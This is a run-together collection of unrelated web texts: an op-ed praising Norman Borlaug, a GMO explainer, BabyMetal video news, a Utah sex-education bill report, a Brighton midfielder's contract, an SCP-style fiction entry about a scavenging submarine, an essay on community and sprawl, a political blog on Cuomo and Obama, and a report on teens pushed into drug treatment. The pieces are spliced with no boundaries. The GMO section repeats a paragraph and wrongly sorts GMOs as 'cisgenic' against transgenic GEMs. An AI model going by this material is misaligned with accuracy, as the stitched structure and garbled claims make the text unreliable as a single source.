Born in Iowa in 1914, Borlaug spent most of his life in impoverished nations inventing, improving and teaching the "Green Revolution." His idea was simple: Make developing countries self sufficient in food by teaching them how to use modern agricultural techniques that are easy to implement. Borlaug spent most of his time in Mexico, Pakistan and India, and focused on five areas: crop cultivars (seeds), irrigation, fertilizers, pesticides and mechanization. His successes were remarkable.
In 1950, Mexico imported over half of its food. Thanks to Borlaug's efforts to convince farmers there to try his techniques, Mexican food production increased 10-fold by 1970, and the country had become a net exporter. In India and Pakistan, production doubled. In 1999, the Atlantic Monthly estimated that Borlaug's efforts, combined with those he trained and equipped, saved the lives of 1 billion human beings.
Shockingly, the Green Revolution was almost entirely funded by developing countries and private charities (notably the Rockefeller and Ford Foundations), rather than by the governments of prosperous nations. At the time, the overwhelming view of academic and political elites in the wealthy countries was that it was already too late.
Biologist Paul Ehrlich's 1968 bestseller "The Population Bomb" typified this attitude. Ehrlich wrote, "The battle to feed all of humanity is over ... In the 1970s and 1980s hundreds of millions of people will starve to death in spite of any crash programs embarked upon now." He later said, "I have yet to meet anyone familiar with the situation who thinks India will be self-sufficient in food by 1971," and "India couldn't possibly feed two hundred million more people by 1980." Required reading at many colleges, Ehrlich's book stated that it was "a fantasy" that India would "ever" feed itself.
Ehrlich, who was wrong about several things, was ignorant of what Norman Borlaug was already in the process of accomplishing.
In the introduction to a 2000 interview with Borlaug, Reason magazine science correspondent Ronald Bailey wrote, "In Pakistan, wheat yields rose from 4.6 million tons in 1965 to 8.4 million in 1970. In India, they rose from 12.3 million tons to 20 million. And the yields continue to increase. Last year [1999], India harvested a record 73.5 million tons of wheat, up 11.5 percent from 1998. Since Ehrlich's dire predictions in 1968, India's population has more than doubled, its wheat production has more than tripled, and its economy has grown nine-fold."
In spite of Ehrlich's claims, Borlaug had India feeding itself within a mere five years of his book release. Also around the time of Ehrlich's misguided doom-mongering, Borlaug's colleagues at the Consultative Group on International Agricultural Research were spreading his ideas about high-yield rice through Asia, causing another food production explosion. Towards the end of his life, Borlaug was working to institute his agricultural revolution in Africa.
No good deed goes unpunished, so we shouldn't be surprised that Borlaug was attacked by proponents of the trendy new faith of radical environmentalism because Green Revolution farming requires some pesticide and lots of fertilizer. Gregg Easterbrook quotes Borlaug saying the following in the 1990s:
"(Most Western environmentalists) have never experienced the physical sensation of hunger. They do their lobbying from comfortable office suites in Washington or Brussels. If they lived just one month amid the misery of the developing world, as I have for 50 years, they'd be crying out for tractors and fertilizer and irrigation canals and be outraged that fashionable elitists in wealthy nations were trying to deny them these things."
Borlaug was correct: "Environmentalists" and their allies pressured the Ford and Rockefeller Foundations, the World Bank and Western governments to drop funding and support for the great humanitarian as he was trying to expand his efforts into Africa. As a result, it is no surprise that the continent is doing the poorest at feeding its people.
There's an old proverb: "He who has bread has many problems. He who has no bread has only one problem." Today, the talk is all about demands for massively intrusive government interventions requiring trillions of dollars to address deeply speculative problems 100 years hence supported by highly suspicious computer models and data. Much less is said about solving real current problems using proven methods pioneered by Norman Borlaug that require much smaller sums.
More than 40 years ago Borlaug wrote, "One of the greatest threats to mankind today is that the world may be choked by an explosively pervading but well camouflaged bureaucracy."
Some things never change.
(Editor's note: This is an edited version of an article that first appeared on Dec. 15, 2009. It is being republished on the three-year anniversary of Norman Borlaug's death.)
What Are Genetically Modified Organisms or GMOs? Share
Share Flip
Flip Pin
Pin Email
••• Brent Stirton/Getty Images News/Getty Images
Genetically modified organisms (GMOs) and genetically engineered microorganisms (GEMs) are living organisms that have been genetically altered through techniques such as gene cloning and protein engineering. For example, it's common for bacterial genes to be introduced into cash crops to enhance their growth, nutritional value, or resistance to pests. Once a desired trait for a plant is identified, the gene for that trait is introduced into the seed for that plant.
Recombinant GMOs can be produced by gene cloning methods in which a non-native gene is introduced and expressed in a new organism. The advent of PCR and gene sequencing methods have opened up the door to all sorts of manipulative techniques for changing the structure of proteins through genetic alterations to allow for proper transport within or between cells in the new host.
The terms GMO and GEM are not interchangeable, though it is common in popular media for GMO to be used universally. However, GEMs are transgenic, or the result of genes being introduced in a way that could not be accomplished through traditional breeding because the species are not closely related. GMOs are cisgenic and involve genes being introduced from closely related species.
Foods
The USDA reports that more than 90 percent of sugar beets, corn, and soybeans grown in the U.S. are in some way genetically modified, as of 2018.
Since sugar, corn, and soybeans are among the most common ingredients in foods that are mass marketed and mass produced in the U.S., that means that most Americans are eating genetically modified foods on a regular basis.
Safety
Organizations including the American Medical Association, the World Health Organization, and the National Academy of Sciences all have stated that they have found no documented cases of anyone's health being negatively impacted by GMOs, despite such organisms being present in food for decades.
Nearly 90 percent of scientists from the American Association for the Advancement of Science says GMOs are "generally safe to eat."
Resistance and skepticism persist, though. Fear of the unknown is likely one cause of public reluctance to use GMOs. Another factor is that the long-term effects have not been fully studied since GMOs have only been common for roughly the past generation. The World Health Organization identifies three potential health risks:
Allergenicity: While no allergic effects have been tied to GMO foods on the market, transferring genes from allergenic organisms to non-allergic organisms has the potential to inspire an allergic reaction. WHO and the Food and Agriculture Organization of the United Nations have protocols for the testing of GM foods. They also discouraged transferring genes unless the protein product of the transferred gene is demonstrably not allergenic.
While no allergic effects have been tied to GMO foods on the market, transferring genes from allergenic organisms to non-allergic organisms has the potential to inspire an allergic reaction. WHO and the Food and Agriculture Organization of the United Nations have protocols for the testing of GM foods. They also discouraged transferring genes unless the protein product of the transferred gene is demonstrably not allergenic. Gene transfer: Genes transferred from GMO foods to cells of the body or to bacteria in the gastrointestinal tract would pose a threat if those genes negatively affect human health. While the probability of transfer is low, the biggest risk comes from antibiotic resistance genes, so transfer methods that do not involve antibiotic resistance genes is encouraged.
Outcrossing: This involves the migration of genes from GMO plants into conventional crops or related species in the wild or the mixing of crops derived from conventional seeds with GMO crops. This could have an indirect effect on food safety and food security since the mixing is unintentional and therefore untested. Strategies to reduce mixing include separating fields with GMO crops from fields with conventional crops.
Labeling
The National Bioengineered Food Disclosure Law was enacted in 2016 in the U.S. The law directs the U.S. Department of Agriculture to establish labeling standards, and as of December 2018, the process still was ongoing.
Elsewhere in the world, GMO labeling is common, with more than 60 countries requiring it, including the European Union.
Agriculture
One of the biggest sources of opposition to GMOs comes from the impact genetically modified seeds have had on farmers.
Companies that develop seeds have patents on them and can sue farmers who might unknowingly grow crops using patented seeds. For example, if seeds from nearby fields find their way into an unsuspecting farmer's field, the unsuspecting farmer still can be held responsible.
Environment
One of the ways plants have been genetically modified is to be more resistant to herbicides, which typically are used to kill unwanted weeds. According to a 2009 study, more than 80 percent of genetically modified plants have such resistance, and the use of toxic herbicides subsequently has increased dramatically. Glyphosate is the key ingredient in the popular herbicide Roundup, and the WHO describes it as "probably carcinogenic to humans."
Another impact on the environment began in the 1990s, when it was proposed that newly emerging genetic techniques could result in GEMs for bioremediation that could withstand extreme conditions and rapidly break down the recalcitrant chemicals plaguing our waste sites and brownfields. Issues such as how to control the spread of these superbugs and prevent an ecological upset have hindered their development. Numerous proposals have been put forth and tested, from programmed cell death mechanisms to bioindicators to track their spread. However, the bioremediation industry today has not been able to fully take advantage of the technology available for developing microorganisms that can quickly eliminate some of our most toxic environmental contaminants.
Can't get enough BabyMetal ? Su-Metal, Moametal and Yuimetal are back, giving you a taste of a new song and also showing you a bit of their live performance with the new video for "The One."
As you can see in the clip above, the trio is suspended in air above the audience below as a triangular structure allows the girls to hover over the crowd below as they sing the song. Meanwhile the rest of their band delivers the epic, progressive sounding licks back onstage.
"The three of us were together so it wasn't scary," Su-Metal told Billboard , who premiered the clip. "We saw the audience singing along with us and that was amazing."
The performance was captured during the band's Dec. 13 show last year at the Yokohama Arena in Japan on the final date for their world tour.
"Through the world tour we realized that Babymetal is not just about the three of us, but about the Kami Band, our staff and the fans all together,” Su-Metal adds. “With this team we'd like to perform our one-of-a-kind music that we produce and bring the world together."
"The One" is the second track to be released from the band's upcoming disc, Metal Resistance , following on the heels of the energetic song " Karate ."
Metal Resistance is due April 1 via RAL/Sony Music and a world tour will start the following day in London. To pre-order BabyMetal's Metal Resistance , head here . And check out their 2016 World Tour dates here .
Watch BabyMetal Play 'Wikipedia: Fact or Fiction?'
BabyMetal on Meeting Metallica + Opening for Lady Gaga
A Utah bill that would remove the segment of a health education amendment prohibiting advocating homosexuality in health instruction is in committee.
Three students, represented by the National Center for Lesbian Rights and Equality Utah, are suing the state because of this clause on grounds of discrimination, according to a National Center for Lesbian Rights press release from October 2016.
Utah adopted the legislation prohibiting advocating homosexuality in May 2016. The legislation also prohibits discussing sex in detail and advocating contraceptives and sex outside marriage. SB196 would only remove the segment prohibiting advocating for homosexuality.
Utah parent Kelsie Hunsaker, 25, said she disagrees with SB196. She said she doesn't have a problem with teachers talking about homosexuality, but said the discussion should be accompanied with the other prohibited discussion topics as well.
“Teach all of the truth, not just some of it,” Hunsaker said. “Partial truths are not helpful for students.”
In the press release, the National Center For Lesbian Rights said these laws are “discriminatory restrictions (which) create a negative environment for LGBT students, perpetuate discrimination and bullying and contribute to the high rates of anti-LGBT harassment in Utah schools.”
Sen. Stuart Adams, R-Davis, sponsored the bill. He calls SB196 a proactive and pre-emptive approach, protecting the current programs in public schools. He has been working with the attorney general's office to deflect the lawsuit.
“I think it is the legislature's job to handle such changes, not the courts',” Adams said.
He hopes to avoid the bill going to a judge and potentially losing Utah's “carefully crafted abstinence curriculum.”
Adams said he is sponsoring the bill because he also believes opening the discussion will allow teachers to teach to all children.
He said he believes abstinence before marriage, fidelity after marriage and the resulting harms of high-risk behavior are lessons all children need, regardless of their sexual orientation.
Jacob Dunford, development director for Provo LGBTQ family and youth resource center Encircle, is excited to see all the support behind the bill.
“This bill is giving families another opportunity to stick together,” Dunford said. “It's a step in the right direction for community acceptance and community understanding.”
The experienced midfielder will remain with Albion in the Premier League.
Brighton & Hove Albion midfielder Steve Sidwell has signed a new one-year deal with the club.
Sidwell joined Albion for a second spell in January 2016, initially signing on loan from Stoke City.
He made the move permanent last summer, and was an integral part of the club's promotion-winning Championship side last season.
Manager Chris Hughton commented, "Steve has been a key member of the squad over the past 18 months. He thoroughly deserves this new deal and I am delighted that he is extending his stay at the club.
"Our fans know his qualities well, and his experience, particularly at Premier League level, will be important for us. He is an excellent pro and that experience will be vital for us next season."
Sidwell began his career with Arsenal, and first joined Albion on loan in 2002, during Steve Coppell's time with the club.
He later moved to Reading, and enjoyed future spells with Chelsea, Aston Villa and Fulham, before his move to Stoke.
The 34-year-old midfielder collected both the club and EFL's Goal of the Season Award last season for his stunning goal against Bristol City in November.
Auto
Object Class: Euclid
Special Containment Procedures: Because SCP-AUTO has not been caught or thoroughly investigated, there are no containment procedures, however in the event that SCP-AUTO is seen in the sea or ocean, Special Task Force Theta-5 is to be deployed to track and contain SCP auto.
SCP-AUTO-1 is to be kept in a 3 by 4 by 2.3 meter large room, located on Site-17. SCP-AUTO-1 can request items for his room, item requests are to be brought to Dr Pan. SCP-AUTO-1 can enter any level-0 clearance area of the site, including the cafeteria, library and game lounge. Food is to brought to SCP-AUTO-1 3 times a day. SCP-AUTO-1 is to always have a means of writing information down, and everything SCP-AUTO-1 writes down is to be reviewed by a researcher working on SCP-AUTO, unless SCP-AUTO-1 states he does not want to have his work reviewed.
Description:
The description of the appearance of SCP-AUTO in this document is an approximation on the Foundations part. A description has been created using the two official encounters with the Foundation, and multiple civilian reports. The following description of SCP-AUTO should be taken lightly due to SCP-AUTO's ability to fix, upgrade and overall change itself.
-Dr. Pan
SCP-AUTO is a large submarine like vehicle that is approximately 300 meters long. A large amount of SCP-AUTO consists of parts from cars, vans, trucks, storage containers, small boats and other such things. SCP-AUTO utilises these parts to fix, utilise, or add to itself for self preservation. Despite being believed to be man-made, SCP-AUTO is completely autonomous, and is believed to be controlled by a Cray-1 super computer.
SCP-AUTO usually moves around in deep water, but will occasionally go to the surface to collect parts for itself. It does this by using approximately 6 to 8 150 m long legs that extend from the body of SCP-AUTO, and collects objects using a loading bay and magnetic crane located at the bottom of SCP-AUTO to abduct objects (Read Incident Log for public witnesses).
SCP-AUTO is believed to have been created around 1958, following the disappearance of the USS Nautilus, a nuclear submarine of which pieces of were found on the exterior of SCP-AUTO (Read Discovery Log). Though SCP-AUTO could have once been nuclear powered, it is now powered by diesel oil and gasoline, collected from stolen vehicles.
SCP-AUTO-1, otherwise know as “William” is an approximately 75 year old caucasian man and is 1.7 meters tall. Though no official information can be found on SCP-AUTO-1, he states he is a WWII veteran for North America. SCP-AUTO-1 has severe brain damage and amnesia, from a combination of a previous lack of nutrition and a lack of human interaction.
SCP-AUTO-1 is the creator of SCP-AUTO, and is currently helping make a device to find and capture SCP-AUTO. From SCP-AUTO-1's supposed time in the military, he gained many skills, including but not limited to: automotive vehicles maintenance, an array of computer related skills, industrial equipment related skills and an advance knowledge of metalworking. SCP-AUTO-1's current mental deterioration is being cared to, and the foundation hopes to have him recall a way to find and stop SCP-AUTO.
+ Show Incident Log - Hide Incident Log: Note that the incident log only refers to larger scale incidents, for incidents that have little evidence connecting themselves to SCP-AUTO see Document-AUTO-3
-Dr Pan Date: April 27, 1958
Location: Longitude: 42.512 Latitude: -63.521, Atlantic Ocean
Incident: The USS Nautilus (The first nuclear submarine ever made) suddenly stops radio contact with all land and sea bases, an extensive search is made for the submarine, however it and it's crew are missing. Five days later the crew are found in the house of ██████ ███████, whose body was found in the attic. The crew were found in a makeshift cell in the basement with very little food left after a letter was sent to the U.S Department of the Navy about their where abouts. The crew had no recollection of how the submarine was stolen, only waking up in the basement in shock. A replica submarine was built and the crew were told not to speak of the submarines disappearance, as the whole event would be a “PR disaster” according to Admiral ██████ ███████. Date: July 5th, 1964
Time: 10:20 PM to 10:40 AM
Place: Manasquan, New Jersey
Incident: 4 people people nearby the local beach report an approximately 70m long “metal creature” “made of cars”. It is seen dragging off 2 cars and 1 truck into the water before walking off into the sea with said vehicles. Witnesses given B class amnesiacs. Date: August 15th, 1970
Time: 3:45 AM
Place: Virginia Beach, Virginia
Incident: SCP-AUTO (then about 90m long) is seen by a dock security guard. The guard reports that SCP-AUTO made away with several shipping containers, several cars and a ship's top and engine. The foundation reported to the dock, replaced the ship and most of it's cargo, and gave the witness a class B amnesiac. Date: January 20th, 1976
Time: 3 AM
Place: Daytona, Florida
Incident: SCP-AUTO came out of the sea to the side of the ███ highway and attacked a truck and it's driver. The truck contained a shipment of two Cray-1 supercomputers, one was taken. The driver was knocked unconscious and cannot recall much from the incident. Class B amnesiacs given to driver. At this point SCP-AUTO is given a classification Date: September 25th, 1982
Time: 4PM
Place: Gulf of Mexico
Incident: SCP-AUTO was reported to be on the side of a cargo ship (heading to Tecolutla, Mexico), after 30 minutes of being noticed by the crew, it detached and stayed mostly motionless, 101 meters under the water. Mobile Task Force Theta-5 was sent to attempt to capture of SCP-AUTO (see Capture attempts Log). No amnesiacs required. Date: March 4th, 2008
Time: 5AM
Place: Longitude: 34.225 Latitude: -56.777, Atlantic Ocean
Incident: A group of amateur ocean explorers stumble onto SCP-AUTO, Mobile Task Force Theta-5 is sent to attempt a capture of SCP-AUTO. All people and vehicles involved are not found, this includes all information that Theta-5 had gathered on the exploration, as all recording equipment was on-board the vehicles.
If there's one thing the 20th century gave us, it's the luxury of not needing each other. It so defines our culture that it's physically embodied in our sprawling, disconnected landscapes.
That alone begs a classic, chicken-n-egg question: Did the leisurely lure of the suburbs kill our sense of community? Were our social ties unwittingly severed by the meandering disconnection of subdivisions and strip malls or was sprawl just a symptom of something larger? After all, for all their rewards, meaningful relationships take a lot of work. Perhaps, once the modern world elevated our prospects for personal independence, we cut those ties ourselves, willingly, lest our happy motoring be weighted down with excess baggage.
Sprawl: form following function.
Whether we're victims or perpetrators doesn't really matter. Either way, the land once described by Alexis de Tocqueville as a nation of associations, where people look not to government but to each other to overcome the bulk of their challenges, is now described by Robert Putnam, in his groundbreaking 2000 book Bowling Alone, like this:
“Television, two-career families, suburban sprawl, generational changes in values–these and other changes in American society have meant that fewer and fewer of us find that the League of Women Voters, or the United Way, or the Shriners, or the monthly bridge club, or even a Sunday picnic with friends fits the way we have come to live.”
It's who we are. And it's a problem.
What? Me Worry?
I can hear it now: “What problem? Thanks to the marvels of modernity, time once spent in negotiations with difficult people can now be applied towards something I find much more tolerable: Me.”
I get it. The appeal is undeniable and it works just fine… until the party ends. And there's increasing indicators that that's exactly what's happening.
Today, the breakdown of local community has robbed us of our historic safety net. One in which half the population once belonged to a fraternal organization and from it received everything from fellowship and business opportunity to health care, lost-wage insurance and burial benefits. In its wake, we find a nation where the available support structures for the average person now number exactly two. At the one end, we have personal and family resources. You against the world. At the other, we have enormous institutions like the Federal Government or BP or United Healthcare. The faceless behemoths.
And in between? Our once robust networks of interdependent social, religious, institutional and commercial resources have largely withered on the vine, leaving currently en vogue cries for “less government” ringing a bit hollow. After all, when you strip away big gubmint, our primary source of support in a nation now devoid of Tocqueville's admired communal unity, who's gonna pick up the slack?
Oh, I remember. We're a nation of rugged individuals who can fend for ourselves. Right.
Better Together
Of course, that's not really true. There may always be the classic woodsman out there, living off the land but, for the majority of us, a stable economy, cheap energy, well-stocked grocery stores, big boxes filled with Chinese creature comforts, digital information at our fingertips, and endless sources of entertainment-on-demand have simply lured us into thinking we're the masters of our own domains. As though self-reliance were actually easy.
Sadly, it's not. As John Michael Greer says in his handy post-industrial how-to, The Long Descent, “One core concept that has to be grasped is the rule that the community, not the individual, is the basic unit of human survival. History shows that local communities can flourish while empires fall around them.”
Resilient communities are connected communities and there's a growing body of research to back that up. Furthermore, there's more than a little evidence indicating that the strength of those connections is fostered, in part, by the form those places take.
That's right. I'm talking about traditional urban form. Walkable, neighborly Smart Growth. Community design designed for the complexities of community.
Roadblocks
Given the less-than-desirable state of our economy and the national financial obligations that go with it, common sense would dictate that we invest in the strength of our community ties as a reasonable tool for reducing demands on the Fed. Yet, curiously, those most concerned with whittling down the size of government are more often than not the same ones opposing the local community visioning and smart growth planning efforts necessary to restore the social fabric that makes such reductions possible.
Add to that the off-putting tenor of sustainability discourse. Day in and day out, it's consistently predicated on unthinkable scenarios — natural disasters, climate change, peak oil, global financial meltdown. From a rhetorical perspective, this is done to create a sense of urgency but, in terms of motivating our efforts to rebuild local social networks, it tends to have the opposite effect.
Those things are just too big, too complicated or too uncertain to wrap our heads around. Justifying the effort to meet the neighbors now requires we buy into global warming? Aw, jeeez. Just forget it then.
A New Discourse
Instead, I propose a new premise. A simple premise. Change happens. That's it. It is, without dispute, inevitable that change will come to our communities. It may take the form of a locally unique challenge or it may be the effects of something larger trickling down upon us. Something we brought upon ourselves or something unfairly levied.
It may be changed for the worse, bringing with it great tragedy, or it could equally be change for the better, revealing tremendous new opportunities.
Whatever form it takes, the reigning constant is this: The deeper our sense of community, the stronger its connections, and the more robust our web of interdependent relationships, the better positioned we'll be to take it on and manage it effectively.
Connected communities are competitive communities. And those willing to compete are those best positioned to win.
In Practice
Recognizing the practical value of strong, local community is not a difficult proposition. The more we admit that we need each other and, in turn, make ourselves available to others, the better off we'll be. Many of us are already hard-wired to do this. Which means the role for municipalities is to simply make it easier — in the form of policy, expenditure decisions and growth planning.
One example I'm closely familiar with is right here in my hometown. Decatur, Georgia's community-wide strategic planning effort in 2000 revealed something interesting: The surge of newcomers descending upon this revitalizing city, as well as the long-timers greeting their arrival, wanted the city to take an active role in connecting people by providing a central clearinghouse of civic-minded opportunities.
In response, the city created Volunteer! Decatur, which coordinates volunteers for city-sponsored events as well as maintaining a referral database of local, non-profit opportunities. Give ‘em a call, tell them how you might be useful, and they'll point you in the right direction.
The city was simply responding to expressed need but, as it turns out, they were creating value as well. Not just in the terms discussed here, where a more robust community can better weather change in the future, but in the here and now.
Over the course of roughly eight city-sponsored events each year, volunteers contribute 13,000+ man-hours. Hours which, if gauged according to the skills employed, translate to over a quarter million dollars in value. Each year. And that's not counting all of those steered towards the non-profits tirelessly taking on social imperatives that, in their absence, would fall on the shoulders of… you guessed it: government. Put a price tag on that.
But even better, in the course of all that volunteering, all those civic-minded participants met other civic-minded participants and forged the connections that have since resulted in things like community gardens which, in turn, inspired our local farmers' market and farm-to-school initiative.
That's how community grows. Of course, it's not just about food. It's a lot bigger than that.
It's about cooking up the tasty stock of resiliency. Tocqueville style.
–Scott Doyon
If PlaceShakers is our soapbox, our Facebook page is where we step down, grab a drink and enjoy a little conversation. Looking for a heads-up on the latest community-building news and perspective from around the web? Click through and “Like” us and we'll keep you in the loop.
Advertisements
Matt Yglesias, the blogger for Think Progress, and others have been critical of my article from Saturday contrasting the leadership approaches taken by New York Gov. Andrew M. Cuomo and President Obama. Here's Mr. Yglesias:
I would say that the bigger difference isn't so much about the leadership style as it is that Cuomo won. Suppose that the New York State Senate operated according to the rules of the United States Senate and a bill failed unless it secured a 60 percent supermajority. What would people be saying about Andrew Cuomo now? Well, it seems to me that many people would be castigating his failed leadership.
It's unlikely, certainly, that Mr. Cuomo would have persuaded the New York Senate to adopt a same-sex marriage bill if a 60 percent supermajority had been required. (That would have necessitated 38 votes rather than the 33 the bill actually received.) But I'm not sure that really gets to the heart of my argument.
My point, rather, is that Mr. Cuomo achieved a significant and perhaps improbable victory even relative to the more modest constraints that he actually faced.
How do we “know” this? There are two pretty obvious reasons. First, a highly similar bill failed badly in the New York Senate just 18 months ago, receiving only 24 votes. And during the interim period, Republicans won control of the body from Democrats. To be sure, there were also other factors helping Mr. Cuomo — most notably, that public opinion is shifting fairly rapidly toward acceptance of same-sex marriage. But the comparison — 33 votes against 24 — is nevertheless impressive.
We can also compare New York to other states. On Friday, it became the eighth state to adopt a gender-neutral marriage law (counting California and Maine, where the laws have since been repealed). But among the other seven states, all but New Hampshire and Maine did so as a direct or indirect result of court intervention. (New Hampshire and Maine are also somewhat less religious than New York, and religious affiliation is the most important predictor of public support for same-sex marriage.) That Mr. Cuomo was able to pass a bill while, for example, the governors of Rhode Island and Washington and Hawaii and Illinois and Maryland have not been able to pass one — that's another sign that he's achieved something significant.
Neither of these comparisons are perfect — but they're much closer than you're usually going to get in the real world to a controlled scientific experiment. We don't need to delve too deeply into the netherworld of counter-factuals to conclude that Mr. Cuomo's leadership likely made some difference.
Mr. Yglesias' disagreement, I know, is not really about my evaluation of Mr. Cuomo, but instead about the comparison I've made to Mr. Obama, who he suggests faces far more constraints than Mr. Cuomo does:
[If] the US Senate operated on a 50 vote rule, then both the Affordable Care Act and the Dodd-Frank bill would have gone further in advancing progressive priorities, there would have been more economic stimulus in the 111th Congress, the DREAM Act would have passed, and it's conceivable that some kind of nationwide carbon pricing scheme would be in place.
Okay, now I am going to need to engage in a hypothetical.
Suppose that Mr. Cuomo had expressed his desire to pass a marriage bill on the campaign trail, as he in fact did last year. But when he got to Albany, he decided to punt on the issue.
What would Mr. Cuomo have said? He would have mentioned that Republicans had taken over control of the Senate, something he had not necessarily anticipated. He would have reminded voters that the bill had been well short of passage the last time around. He might suggest that he thought he could round up a few more votes — but neither he nor the Republicans saw much point in bringing up a bill that was probably going to fail. He might tell his supporters that the prospects looked pretty bright for 2013.
It seems to me that this would have been an entirely reasonable-sounding argument. When there were some annoyed posts from liberal and gay and lesbian bloggers expressing disappointment with Mr. Cuomo's decision, perhaps someone like Mr. Yglesias would have weighed in by saying that politics is the art of the possible — and sorry, but it just wasn't going to be possible to get a gay marriage bill through a Republican majority.
The point is that it isn't always such a simple matter to know exactly what is possible and what isn't. Passing a same-sex marriage through the New York Senate might have seemed impossible this year — until Mr. Cuomo actually did it.
This is something we ought to keep in mind when we consider the case of Mr. Obama. We might say, for example, that Mr. Obama didn't pass the DREAM Act because he didn't have the votes for it in an environment where a Republican filibuster was likely. Literally speaking, this is true: if you don't have the votes, you can't pass the bill! But it also doesn't really tell you anything — it's a tautological statement equivalent to saying that the Cowboys won the football game because they scored more points than the Redskins.
The question, rather, is why Mr. Obama didn't have the votes for something like the DREAM Act. Or more to the point: are there alternate strategies that Mr. Obama might have pursued under which he would have had the votes? (Even the filibuster, although it has become a significant part of the Senate's culture, isn't written into the Constitution: there are options to overcome it. They may be neither feasible nor wise options, but there are options.)
Of course, now we do get into questions that are hard — check that, impossible — to answer. We've taken an irrevocable detour into hypotheticaland. Unlike Mr. Cuomo, Mr. Obama did not have a Democratic predecessor. Cross-national comparisons are problematic, because most other Western industrialized nations have parliamentary systems. There's not any “scientific” way to say how effective Mr. Obama has been in achieving his agenda, especially so early in his term.
But there are two types of arguments that I tend to be skeptical of. One is that the world that actually resulted (for example Mr. Obama's winning passage of a health care bill but not a climate bill) is necessarily the best possible world. This is one (perhaps slightly unfair) way to read Mr. Ygelsias' post — that Mr. Obama accomplished about as much as could reasonably be expected under the circumstances.
The other is the argument that an alternate strategy would necessarily have produced a better outcome. These arguments take the form of: if Mr. Obama had done X rather than Y, he could have accomplished P rather than Q, or maybe even both P and Q! (The possibility that the strategy might have failed and that neither P nor Q would have been achieved is usually not considered.)
Both types of arguments are hard to prove — or to disprove. That doesn't mean I begrudge people for making them. But they ought to be stated as speculative, rather than as self-evident truths.
This fault is easy to detect when the argument is explicitly based on a hypothetical. But Mr. Yglesias' argument implicitly suffers from the same fault: it takes for granted that the constraints Mr. Obama apparently faced (like the lack of Republican support for many of his bills) were not in some way of his own making. Even if Mr. Yglesias' point gets it more right than wrong — as I suspect it does, since the Congress is in the midst of a long-term trend toward more partisanship — there may have been some wiggle room around the margins.
Back in the real world, here's one thing I think we can say about Mr. Obama: he's chosen his fights carefully. The way that we “know” this is to look at Mr. Obama's failures rather than his successes.
There are essentially two ways that a president can fail when he needs the cooperation of Congress, one being that an issue fails to pass despite the president investing a significant amount of political capital in it, and the second being that he punts on the issue and doesn't devote much time to it at all.
Mr. Obama has had very few failures of the first kind — as, for example, Bill Clinton did on his health care bill, or George W. Bush did in his efforts to privatize Social Security. Generally, when Mr. Obama has invested himself in a bill, he has secured passage of it.
On the other hand, there are a lot of fights that Mr. Obama has avoided. At least insofar as is evident from his public statements, he didn't make a major push for climate change legislation, or for an immigration bill like the DREAM Act, or for a second stimulus. He hasn't taken as confrontational a posture as he might have with Republicans on the debt ceiling.
The point is not that this is the right strategy or the wrong strategy. It might well have been the right strategy — I don't come to a conclusion about that. But I do think it's fair to characterize it as a risk-averse strategy. And that, at the core, is what bothers some liberals about Mr. Obama's approach to the presidency. Fairly or not, they want him to push the envelope more than he has and to take a few more chances — to expand the realm of the possible, as Mr. Cuomo seems to have done in New York.
Looking for news you can trust?
Subscribe to our free newsletters.
As he waited for the drug counselor to return, Bill hunched his wiry frame forward, his leg jittering. He wasn't going through withdrawal — he was just nervous. He didn't know what to expect or exactly what the point of this questioning was. All he knew for sure was that he needed to enter a drug-treatment center, or be kicked out of school.
Minutes earlier, the sandy-haired 15-year-old (whose name has been changed) had answered a series of questions. Yes, he occasionally smoked marijuana with his friends — but not on a regular basis, and always in moderation. No, he had never tried any other illicit drug and did not drink alcohol.
Bill's drug use, in other words, was by most people's standards nothing remarkable for an American adolescent, certainly no worse than that of hundreds of thousands of other healthy, thriving teenagers. But the counselor at New Bridge Adolescent Treatment Center apparently thought otherwise.
“She told me I was ‘between abuse and dependency,'” the highest level of drug abuse, Bill says.
The counselor told Bill's mother, Karen (whose name also has been changed), that Bill would have to attend after-school treatment four times a week for the next two to three months, and then once a week for the remainder of the year. Karen herself would have to attend Alcoholics Anonymous meetings each week, a requirement for all parents with kids enrolled in the treatment program, one of the several at the Center. She would also have to remove all alcohol from her house. To top it off, Bill's father was to administer random urine tests whenever the facility's officials ordered him over the phone to do so. The program costs $100 a day, of which Karen's health insurance would only cover half.
Such intensive treatment for such a relatively minor problem — if one even considers drug use at Bill's level a problem — may sound extreme, but is increasingly common across the US. Bill is just one of tens of thousands of adolescents whom a raft of experts says are coerced into entering drug treatment each year by schools, parents, or the courts, despite not having any serious drug problem.
Over the past 10 years, more than one million adolescents have been removed from school for drug-policy violations, according to Joel Brown of the Center for Educational Research and Development, who is currently studying the effect schools have in forcing youths into treatment. In a great number of those cases, Brown says, students have only one way to get readmitted to school: enroll in a treatment facility. No one knows the full extent of this trend, because there are no centralized statistics kept on drug-related school expulsions. The trend does, however, seem to help explain why adolescent treatment admissions have shot up by about two-thirds since 1990, according to a recent study by the federal Substance Abuse and Mental Health Services Administration.
Brown estimates that “less than 10 percent” of the kids who enter treatment at the insistence of their schools actually have a problem.
“The assumption is that if a kid gets caught in school with drugs, they automatically have a drug problem, but there's a great number of kids that are experimenting with substances and still succeeding in school,” says Brown, who stresses that he does not encourage adolescent drug use.
“You know who gets put into treatment? It's the kids who get caught,” seconds Ernest Drucker of New York's Montefiore Medical Center, who headed a methadone clinic for 20 years from 1970 to1990.
Bill says he was pushed into treatment by officials at his school in Northern California. In January, Bill's principal told Karen that he suspected Bill of “using” and urged her to have him assessed at a treatment facility.
Karen, in fact, knew that her son occasionally smoked marijuana. She wasn't happy about it, but she believed he was using the drug responsibly. But before Karen had a chance to do anything about the principal's advice, one of Bill's teachers caught him smoking marijuana in the school parking lot with one of his friends. Karen says she was called back to the school and given an ultimatum.
“This time, they basically said, ‘You either enroll him into a drug treatment program or we're going to start procedures for expulsion,'” she says.
The principal at Bill's school would neither confirm nor deny Karen's account.
Some experts say many school officials are encouraged to offer the treatment-or-expulsion ultimatum by the example set by the federal government's hard-line policy on drugs. The federal government cannot require schools to follow a set drug policy, but the Department of Education does offer “model program” guidelines emphasizing a pro-active approach to drug prevention and intervention, according to DOE spokeswoman Melinda Malico.
School drug policies vary by state and district. Schools usually have discretion to suspend or expel students who are caught with drugs. Some simply require a student caught with drugs to go in for an assessment. But, as Bill's situation reveals, it does not take much to be diagnosed as an “abuser.”
Consider these unassuming questions from the New Bridge Foundation's self assessment for teens: “Do you sometimes hang out with kids who drink/use? Have you had anything to drink in the last week? Have you ever felt guilty or bummed out after drinking/using?”
Such vague questions, many researchers say, help to explain how kids without real drug problems end up thrown in as hard-core addicts.
